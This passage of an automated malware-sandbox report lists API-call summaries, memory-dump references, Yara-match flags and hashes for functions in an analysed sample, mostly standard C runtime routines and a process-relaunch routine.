                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00972BFF
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00972C15
                                                                                                  • TranslateMessage.USER32(?), ref: 00972C24
                                                                                                  • DispatchMessageW.USER32(?), ref: 00972C2A
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00972C38
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 2015114452-0
                                                                                                  • Opcode ID: f8d0b2944d032116ed88a653e705071ca3f1aba7664d10a9b8219698efbedf67
                                                                                                  • Instruction ID: d1b7c6c3ed4f4e889bc46a353b85e52e67e172041a213013a63505fd54f5fd94
                                                                                                  • Opcode Fuzzy Hash: f8d0b2944d032116ed88a653e705071ca3f1aba7664d10a9b8219698efbedf67
                                                                                                  • Instruction Fuzzy Hash: B001A973B6830976E6109B94DC41FBE776CEB15B10F508511FB08EA1D8DAA4E80597B4
                                                                                                  Function 0093367A Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __CreateFrameInfo.LIBCMT ref: 009336A2
                                                                                                    • Part of subcall function 00933232: __getptd.LIBCMT ref: 00933240
                                                                                                    • Part of subcall function 00933232: __getptd.LIBCMT ref: 0093324E
                                                                                                  • __getptd.LIBCMT ref: 009336AC
                                                                                                    • Part of subcall function 009298E6: __getptd_noexit.LIBCMT ref: 009298E9
                                                                                                    • Part of subcall function 009298E6: __amsg_exit.LIBCMT ref: 009298F6
                                                                                                  • __getptd.LIBCMT ref: 009336BA
                                                                                                  • __getptd.LIBCMT ref: 009336C8
                                                                                                  • __getptd.LIBCMT ref: 009336D3
                                                                                                    • Part of subcall function 009332D7: __CallSettingFrame@12.LIBCMT ref: 00933323
                                                                                                    • Part of subcall function 009337A0: __getptd.LIBCMT ref: 009337AF
                                                                                                    • Part of subcall function 009337A0: __getptd.LIBCMT ref: 009337BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 3282538202-0
                                                                                                  • Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                  • Instruction ID: cda399f77dd8a6f10c9ab6f4b441b379a19b0279e5fcddf47196d74baa5422fd
                                                                                                  • Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                  • Instruction Fuzzy Hash: 6611D7B1C00209DFDB00EFA4E545BAE7BB0FF48314F148469F854A7252DB389A559F50
                                                                                                  Function 0283FF6D Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __CreateFrameInfo.LIBCMT ref: 0283FF95
                                                                                                    • Part of subcall function 0283FA76: __getptd.LIBCMT ref: 0283FA84
                                                                                                    • Part of subcall function 0283FA76: __getptd.LIBCMT ref: 0283FA92
                                                                                                  • __getptd.LIBCMT ref: 0283FF9F
                                                                                                    • Part of subcall function 0283381A: __getptd_noexit.LIBCMT ref: 0283381D
                                                                                                    • Part of subcall function 0283381A: __amsg_exit.LIBCMT ref: 0283382A
                                                                                                  • __getptd.LIBCMT ref: 0283FFAD
                                                                                                  • __getptd.LIBCMT ref: 0283FFBB
                                                                                                  • __getptd.LIBCMT ref: 0283FFC6
                                                                                                    • Part of subcall function 0283FB1B: __CallSettingFrame@12.LIBCMT ref: 0283FB67
                                                                                                    • Part of subcall function 02840093: __getptd.LIBCMT ref: 028400A2
                                                                                                    • Part of subcall function 02840093: __getptd.LIBCMT ref: 028400B0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 3282538202-0
                                                                                                  • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                  • Instruction ID: b0af54e49ca14ae6472ee94732bad585236081eb5a9cbe7fb279b274afddcbdc
                                                                                                  • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                  • Instruction Fuzzy Hash: 2711D7B9D10209DFDB01EFA8D844AED7BB2FF08314F1084A9E914E7250DB389A559F91
                                                                                                  Function 02D04B70 Relevance: 7.5, APIs: 6, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02D04B83
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02D04B8D
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02D04BA0
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02D04BA3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3168844106-0
                                                                                                  • Opcode ID: ab51aa9b26724b72411e6fe724520d25861f94ba03a0501841126b17bd6be58e
                                                                                                  • Instruction ID: 32b6ffbcbc07bbe45b5721daaf89036ed3a60b90044a4d24edd651b803cec43f
                                                                                                  • Opcode Fuzzy Hash: ab51aa9b26724b72411e6fe724520d25861f94ba03a0501841126b17bd6be58e
                                                                                                  • Instruction Fuzzy Hash: 45014F766016149BD720EB29FCC8B9BB7E8EF88354F024969F54683750C775EC49CA60
                                                                                                  Function 00974B50 Relevance: 7.5, APIs: 6, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 00974B63
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 00974B6D
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 00974B80
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 00974B83
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3168844106-0
                                                                                                  • Opcode ID: a72636b20c70e0f8eebaed14b4c7b83872e9e9c2e4d9580d86782ccdf2bf7e65
                                                                                                  • Instruction ID: 84e6433c4cd37dcc4b4d30daee8159823d45480bfac1ffd3ef45f742ca479cc4
                                                                                                  • Opcode Fuzzy Hash: a72636b20c70e0f8eebaed14b4c7b83872e9e9c2e4d9580d86782ccdf2bf7e65
                                                                                                  • Instruction Fuzzy Hash: C2018F766046109FD7209B39FCC4BAFB7ECEB88324F014829E10A83200C734EC49DBA1
                                                                                                  Function 03FC4869 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __CreateFrameInfo.LIBCMT ref: 03FC4891
                                                                                                    • Part of subcall function 03FC4372: __getptd.LIBCMT ref: 03FC4380
                                                                                                    • Part of subcall function 03FC4372: __getptd.LIBCMT ref: 03FC438E
                                                                                                  • __getptd.LIBCMT ref: 03FC489B
                                                                                                    • Part of subcall function 03FB8116: __getptd_noexit.LIBCMT ref: 03FB8119
                                                                                                    • Part of subcall function 03FB8116: __amsg_exit.LIBCMT ref: 03FB8126
                                                                                                  • __getptd.LIBCMT ref: 03FC48A9
                                                                                                  • __getptd.LIBCMT ref: 03FC48B7
                                                                                                  • __getptd.LIBCMT ref: 03FC48C2
                                                                                                    • Part of subcall function 03FC4417: __CallSettingFrame@12.LIBCMT ref: 03FC4463
                                                                                                    • Part of subcall function 03FC498F: __getptd.LIBCMT ref: 03FC499E
                                                                                                    • Part of subcall function 03FC498F: __getptd.LIBCMT ref: 03FC49AC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 3282538202-0
                                                                                                  • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                  • Instruction ID: 008943eacb424024eeb07db11e7d25592b0b9ddc7ff750c19d5873118f02834c
                                                                                                  • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                  • Instruction Fuzzy Hash: EF1116B5C01349DFDF00EFA5CA45AEDBBB4FF48310F108069E854AB250EB399A119F50
                                                                                                  Function 0092E116 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 0092E122
                                                                                                    • Part of subcall function 009298E6: __getptd_noexit.LIBCMT ref: 009298E9
                                                                                                    • Part of subcall function 009298E6: __amsg_exit.LIBCMT ref: 009298F6
                                                                                                  • __getptd.LIBCMT ref: 0092E139
                                                                                                  • __amsg_exit.LIBCMT ref: 0092E147
                                                                                                  • __lock.LIBCMT ref: 0092E157
                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0092E16B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 938513278-0
                                                                                                  • Opcode ID: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                  • Instruction ID: a1376dcd518d2270e7cf8e185aae2a61d77674f4c8971fd426e661bd2f549af4
                                                                                                  • Opcode Fuzzy Hash: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                  • Instruction Fuzzy Hash: 95F0B4329486309BEB21FBB4B84375D32A0AF80720F184119F550672DBCB749851DA96
                                                                                                  Function 028349C5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 028349D1
                                                                                                    • Part of subcall function 0283381A: __getptd_noexit.LIBCMT ref: 0283381D
                                                                                                    • Part of subcall function 0283381A: __amsg_exit.LIBCMT ref: 0283382A
                                                                                                  • __getptd.LIBCMT ref: 028349E8
                                                                                                  • __amsg_exit.LIBCMT ref: 028349F6
                                                                                                  • __lock.LIBCMT ref: 02834A06
                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 02834A1A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 938513278-0
                                                                                                  • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                  • Instruction ID: 87628369c2ce08f4dd71a081f50df1d18e4c4241a69643bde6eba6d1d95684df
                                                                                                  • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                  • Instruction Fuzzy Hash: B1F0903E9012109AE623BBAC980178936A1BF00725F258289E808E72E1DB245941DEDB
                                                                                                  Function 02D15006 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 02D15012
                                                                                                    • Part of subcall function 02D13E5B: __getptd_noexit.LIBCMT ref: 02D13E5E
                                                                                                    • Part of subcall function 02D13E5B: __amsg_exit.LIBCMT ref: 02D13E6B
                                                                                                  • __getptd.LIBCMT ref: 02D15029
                                                                                                  • __amsg_exit.LIBCMT ref: 02D15037
                                                                                                  • __lock.LIBCMT ref: 02D15047
                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 02D1505B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 938513278-0
                                                                                                  • Opcode ID: eaa3632ecbea9e7a61c79dcc7ab112c486802fb1a39adde2abbc5c23db95dc7b
                                                                                                  • Instruction ID: 87691819891328121922738fa0afa11f70ea2875ca6003b73db2f982d6496fae
                                                                                                  • Opcode Fuzzy Hash: eaa3632ecbea9e7a61c79dcc7ab112c486802fb1a39adde2abbc5c23db95dc7b
                                                                                                  • Instruction Fuzzy Hash: 15F09032944711FAEAB0BBA8B401B8D73A2EF40B24F610249D559A7FC1CB388C41DEA5
                                                                                                  Function 0097E13F Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 0097E14B
                                                                                                    • Part of subcall function 0097990F: __getptd_noexit.LIBCMT ref: 00979912
                                                                                                    • Part of subcall function 0097990F: __amsg_exit.LIBCMT ref: 0097991F
                                                                                                  • __getptd.LIBCMT ref: 0097E162
                                                                                                  • __amsg_exit.LIBCMT ref: 0097E170
                                                                                                  • __lock.LIBCMT ref: 0097E180
                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0097E194
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 938513278-0
                                                                                                  • Opcode ID: ca48fa60cd8d0aa2b7bd3c538dda4f9da509cb376760db836b0518020fbc311f
                                                                                                  • Instruction ID: aab4ee1a7ea3d3c9e86cee74c9bb3dbec45af328bca7be14bb3736ddee28702b
                                                                                                  • Opcode Fuzzy Hash: ca48fa60cd8d0aa2b7bd3c538dda4f9da509cb376760db836b0518020fbc311f
                                                                                                  • Instruction Fuzzy Hash: D3F0903394C6109BE721BBB8980375932A0AF84B20F54C18DF46DA72D2CF744900DA59
                                                                                                  Function 03FB92C1 Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 03FB92CD
                                                                                                    • Part of subcall function 03FB8116: __getptd_noexit.LIBCMT ref: 03FB8119
                                                                                                    • Part of subcall function 03FB8116: __amsg_exit.LIBCMT ref: 03FB8126
                                                                                                  • __getptd.LIBCMT ref: 03FB92E4
                                                                                                  • __amsg_exit.LIBCMT ref: 03FB92F2
                                                                                                  • __lock.LIBCMT ref: 03FB9302
                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 03FB9316
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 938513278-0
                                                                                                  • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                  • Instruction ID: aca22084980d75155507946b36bd5ff7ea9f179ad1d20b6f8e07af068154efae
                                                                                                  • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                  • Instruction Fuzzy Hash: 22F0B4BAD09710DBEB61FB7A8C027CE77B8AF00760F19011DD6456F2D0CBA44940CA56
                                                                                                  Function 02D0C910 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 02D0C932
                                                                                                  • GetCommandLineW.KERNEL32 ref: 02D0C938
                                                                                                  • GetStartupInfoW.KERNEL32(?), ref: 02D0C947
                                                                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 02D0C96F
                                                                                                  • ExitProcess.KERNEL32 ref: 02D0C977
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                  • String ID:
                                                                                                  • API String ID: 3421218197-0
                                                                                                  • Opcode ID: b29413f53a7b2381ab1757795e4a6a5dcfe81d7365e391f78b016ca51a8838f5
                                                                                                  • Instruction ID: e833decc44404733ba3c431d22416ab4bfe33d73a35a67c02e087a1d2b64bbc1
                                                                                                  • Opcode Fuzzy Hash: b29413f53a7b2381ab1757795e4a6a5dcfe81d7365e391f78b016ca51a8838f5
                                                                                                  • Instruction Fuzzy Hash: 4AF090319C4318BBEB309BA0DC4DFEA7778FB14B00F210694BB19A61C4DA706E58CB54
                                                                                                  Function 02D075B0 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 02D075D2
                                                                                                  • GetCommandLineW.KERNEL32 ref: 02D075D8
                                                                                                  • GetStartupInfoW.KERNEL32(?), ref: 02D075E7
                                                                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 02D0760F
                                                                                                  • ExitProcess.KERNEL32 ref: 02D07617
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                  • String ID:
                                                                                                  • API String ID: 3421218197-0
                                                                                                  • Opcode ID: 52542ce28f7ca2929899bbc27f411c7b31259ef27ef5098b5dc2cfb0c2edafb7
                                                                                                  • Instruction ID: 90bebdca9055e27c05a84baac6820d7c3143a4e615044583bc954f3766747dd8
                                                                                                  • Opcode Fuzzy Hash: 52542ce28f7ca2929899bbc27f411c7b31259ef27ef5098b5dc2cfb0c2edafb7
                                                                                                  • Instruction Fuzzy Hash: D2F0B4719C4319BBE7309BA0DC4DFD97778EB14B00F610694BB19A61C4DA706E58CF54
                                                                                                  Function 02D0F9B8 Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D11CD0: _doexit.LIBCMT ref: 02D11CDC
                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 02D0F9CA
                                                                                                    • Part of subcall function 02D13CA0: TlsGetValue.KERNEL32(00000000,02D13DF9,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000), ref: 02D13CA9
                                                                                                    • Part of subcall function 02D13CA0: DecodePointer.KERNEL32(?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000,?,02D13F06,0000000D), ref: 02D13CBB
                                                                                                    • Part of subcall function 02D13CA0: TlsSetValue.KERNEL32(00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000,?,02D13F06), ref: 02D13CCA
                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 02D0F9D5
                                                                                                    • Part of subcall function 02D13C80: TlsGetValue.KERNEL32(?,?,02D0F9DA,00000000), ref: 02D13C8E
                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 02D0F9E8
                                                                                                    • Part of subcall function 02D13CD4: DecodePointer.KERNEL32(?,?,?,02D0F9ED,00000000,?,00000000), ref: 02D13CE5
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 02D0F9F1
                                                                                                  • ExitThread.KERNEL32 ref: 02D0F9F8
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0F9FE
                                                                                                  • __freefls@4.LIBCMT ref: 02D0FA1E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 781180411-0
                                                                                                  • Opcode ID: 064f8d9c8eafe756d484cbeb99a3e882f24c2b38b1bcf9fd9dc1e3c7e1b0c7dc
                                                                                                  • Instruction ID: dbbacf5e7404b25952ddcf5573bb0b19c48469f0edac27c92bbd57ab74c60148
                                                                                                  • Opcode Fuzzy Hash: 064f8d9c8eafe756d484cbeb99a3e882f24c2b38b1bcf9fd9dc1e3c7e1b0c7dc
                                                                                                  • Instruction Fuzzy Hash: 38E04F31C402157B8F5037B2AD0CA8E7A1FDE00381F210480FE04A3B10EE24DD91CBB1
                                                                                                  Function 009771AA Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 009782F0: _doexit.LIBCMT ref: 009782FC
                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 009771BC
                                                                                                    • Part of subcall function 00979754: TlsGetValue.KERNEL32(00000000,009798AD,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000), ref: 0097975D
                                                                                                    • Part of subcall function 00979754: DecodePointer.KERNEL32(?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000,?,009799BA,0000000D), ref: 0097976F
                                                                                                    • Part of subcall function 00979754: TlsSetValue.KERNEL32(00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000,?,009799BA), ref: 0097977E
                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 009771C7
                                                                                                    • Part of subcall function 00979734: TlsGetValue.KERNEL32(?,?,009771CC,00000000), ref: 00979742
                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 009771DA
                                                                                                    • Part of subcall function 00979788: DecodePointer.KERNEL32(?,?,?,009771DF,00000000,?,00000000), ref: 00979799
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 009771E3
                                                                                                  • ExitThread.KERNEL32 ref: 009771EA
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009771F0
                                                                                                  • __freefls@4.LIBCMT ref: 00977210
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
